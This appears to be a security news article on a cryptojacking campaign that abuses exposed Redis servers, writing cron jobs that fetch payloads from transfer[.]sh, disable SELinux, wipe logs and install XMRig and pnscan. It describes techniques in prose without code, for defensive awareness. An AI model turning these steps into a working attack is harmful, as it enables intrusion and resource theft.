In the past few months, Redis servers have been prominently targeted by several threats, such as HeadCrab botnet, Redigo, and WatchDog. A new cryptojacking campaign has been detected targeting exposed Redis deployments wherein attackers abused the public file transfer service transfer[.]sh to hide their malicious activities.
What's happening in the cryptojacking campaign
According to Cado Labs, the attack begins with a scan for the Redis servers exposed to the internet.
For initial access, attackers target exploitable Redis instances, write a cron job to its data store, and push a database file to one of its cron job directories.
This database file includes executable commands that attackers plan to run on the machine. When this database file is read by the cron scheduler, it parses the commands and runs them, thus, allowing arbitrary code execution on the target machine.
For example, it may contain a cron job that is executed every minute and runs a cURL command to download a script or payload hosted on the transfer[.]sh service, probably as an alternative to the Pastebin service.
The downloaded script is saved as a .cmd file and executed using a bash shell. This ensures that the actual malicious commands are not written to the history log file.
The payload script
Although the objective of the campaign is to mine cryptocurrencies, the script performs several additional tasks to ensure the effective utilization of resources.
The script disables SELinux and ensures that the DNS requests are resolved by public resolvers.
It removes the other cron jobs and the cron spool to free the resources. Further, it uses the sync utility command to dump the data held in memory to the disk, hence, freeing up more space on the RAM.
Moreover, it clears the log files, configures the iptables, and terminates any other mining tasks running on the machine. Along with additional packages, it then downloads the pnscan (a mass network scanning utility) and XMRig.
While the XMRig begins with mining-related tasks, such as registering the miner with several mining pools, pnscan is used to find and infect more vulnerable Redis servers.
Concluding notes
Besides targeting exposed Redis servers, attackers are now switching to new open platforms, such as transfer[.]sh, to evade detection. It is imperative that administrators actively monitor any misconfigurations in Redis servers and fix them. Furthermore, it is suggested to regularly monitor and assess their cloud environment and network traffic for any malicious activities.